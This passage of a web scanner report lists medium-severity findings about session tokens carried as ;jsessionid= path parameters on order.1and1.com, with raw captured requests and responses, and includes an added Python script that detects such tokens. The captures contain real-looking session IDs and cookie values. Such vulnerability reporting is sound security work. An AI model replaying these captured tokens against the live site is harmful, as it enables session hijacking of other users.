The URL in the request carries a session token as a ;jsessionid= path parameter:

Request

GET /xml/order/Domaininfo;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:37:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Domaininfo?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.8. http://order.1and1.com/xml/order/DomaininfoMove

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/DomaininfoMove

Issue detail

The URL in the request carries a session token as a ;jsessionid= path parameter:

Request

GET /xml/order/DomaininfoMove;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:23:36 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/DomaininfoMove?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domainTransfer
Content-Length: 0
Connection: close
Content-Type: text/plain


3.9. http://order.1and1.com/xml/order/Eshops

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Eshops

Issue detail

The URL in the request carries a session token as a ;jsessionid= path parameter:

Request

GET /xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:33:34 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Eshops?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.ecommerce
Content-Length: 0
Connection: close
Content-Type: text/plain


3.10. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsChat

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/FeatureCommunicationToolsChat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=cY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiMmISQlHh8=; Expires=Fri, 07-Apr-2079 21:59:59 GMT; Path=/
ETag: 649375030d8d5b092e64c0990c7227c7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17430


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=FeatureCommunicationToolsChat&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=FeatureCommunicationToolsChat&amp;page=switch&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=FeatureCommunicationToolsChat&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...
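The checks behind findings 3.5 (a session token in the request URL) and 3.10 (response links that carry the token) can be reproduced outside the scanner with the following Python. It is added here as an example and is not part of the XSS.CX report or of the scanner that produced it. It uses only the standard library; the token names other than jsessionid, the fake token value, and the sample request line and HTML fragment are constructed for the example. Because the token is a path parameter, the URL is split with urlsplit (which keeps ;name=value inside the path) instead of being read as query parameters only, and href values are HTML-unescaped before the query string is parsed. A third helper, redirect_strips_token, expresses the 301 behaviour seen in findings 3.6 to 3.9: the Location header drops the token, which does not undo its transmission in the original request.

```python
import re
from html import unescape
from urllib.parse import urlsplit, parse_qsl

# Parameter names treated as session tokens. "jsessionid" is the one this
# report shows; the rest are common equivalents and are an assumption.
SESSION_TOKEN_NAMES = ("jsessionid", "phpsessid", "sessionid", "sid", "aspsessionid")

# Servlet URL rewriting places the token in a path parameter, i.e. before
# the "?":  /xml/order/Home;jsessionid=<id>.<node>?__frame=_top
# A query-string parser never sees it, so the path is scanned separately.
_PATH_PARAM_RE = re.compile(r";([^;/?#=]+)=([^;/?#]*)")

# href/src/action attribute values (the report's links are double-quoted).
_URL_ATTR_RE = re.compile(r"""(?:href|src|action)\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def session_tokens_in_url(url):
    """Return [(where, name, value)] for each session-token parameter in url.

    where is "path" for a ;name=value path parameter and "query" for a
    ?name=value query parameter."""
    parts = urlsplit(url)  # urlsplit keeps ";..." inside .path
    found = []
    for name, value in _PATH_PARAM_RE.findall(parts.path):
        if name.lower() in SESSION_TOKEN_NAMES:
            found.append(("path", name, value))
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in SESSION_TOKEN_NAMES:
            found.append(("query", name, value))
    return found


def request_line_has_session_token(request_line):
    """Check the request line of a raw HTTP request (finding 3.5 style)."""
    fields = request_line.split(" ")
    if len(fields) != 3:
        return []
    return session_tokens_in_url(fields[1])


def links_with_session_tokens(html):
    """Return every URL in an HTML body that carries a session token (finding 3.10 style)."""
    hits = []
    for raw in _URL_ATTR_RE.findall(html):
        url = unescape(raw)  # "&amp;" -> "&" before the query string is parsed
        if session_tokens_in_url(url):
            hits.append(url)
    return hits


def redirect_strips_token(request_target, location):
    """True when the request URL carried a token but the redirect target does not.

    The 301 responses in findings 3.6 to 3.9 behave this way: Location
    repeats the path and query without ";jsessionid=". The token still
    left the client in the original request (and in any Referer), so the
    redirect does not clear the finding."""
    return bool(session_tokens_in_url(request_target)) and not session_tokens_in_url(location)


# Constructed sample input in the report's format (fake token value).
SAMPLE_REQUEST_LINE = (
    "GET /xml/order/CloudDynamicServer;jsessionid=0123456789ABCDEF0123456789ABCDEF.node1"
    "?__frame=_top&__lf=Static HTTP/1.1"
)

SAMPLE_HTML = """
<li><a class="core_button_normal" href="/xml/order/Home;jsessionid=0123456789ABCDEF0123456789ABCDEF.node1?__frame=_top&amp;linkId=hd.nav.home">Home</a></li>
<a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=0123456789ABCDEF0123456789ABCDEF.node1?__frame=_top&amp;linkType=txt">Tell a friend</a>
<a href="/xml/order/Contact?__frame=_top&amp;linkId=hd.nav.support">Contact</a>
<img src="/modules/frontend-skin-odin/img/header/logo_1and1.png" alt="logo">
"""

if __name__ == "__main__":
    for where, name, value in request_line_has_session_token(SAMPLE_REQUEST_LINE):
        print(f"request line: {name} in {where} = {value}")
    for url in links_with_session_tokens(SAMPLE_HTML):
        print(f"response link carries token: {url}")
    print("301 strips token:", redirect_strips_token(
        "/xml/order/Contact;jsessionid=0123456789ABCDEF0123456789ABCDEF.node1?__frame=_top",
        "http://order.1and1.com/xml/order/Contact?__frame=_top"))
```

Run it directly to see the three checks against the samples; to triage a larger crawl, feed it the request lines and response bodies saved from a proxy log and keep only the links whose token differs from the one the client already holds.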

3.11. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsChat

Issue detail

The URL in the request carries a session token as a ;jsessionid= path parameter:

Request

GET /xml/order/FeatureCommunicationToolsChat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=cY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiMmISQlHh8=; Expires=Fri, 07-Apr-2079 21:59:59 GMT; Path=/
ETag: 649375030d8d5b092e64c0990c7227c7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17430


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.12. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsDialogue

Issue detail

The URL in the request carries a session token as a ;jsessionid= path parameter:

Request

GET /xml/order/FeatureCommunicationToolsDialogue;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:46:00 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.13. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsMerchandise

Issue detail

The URL in the request carries a session token as a ;jsessionid= path parameter:

Request

GET /xml/order/FeatureCommunicationToolsMerchandise;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:42:48 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.14. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsNewsletter

Issue detail

The URL in the request carries a session token as a ;jsessionid= path parameter:

Request

GET /xml/order/FeatureCommunicationToolsNewsletter;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
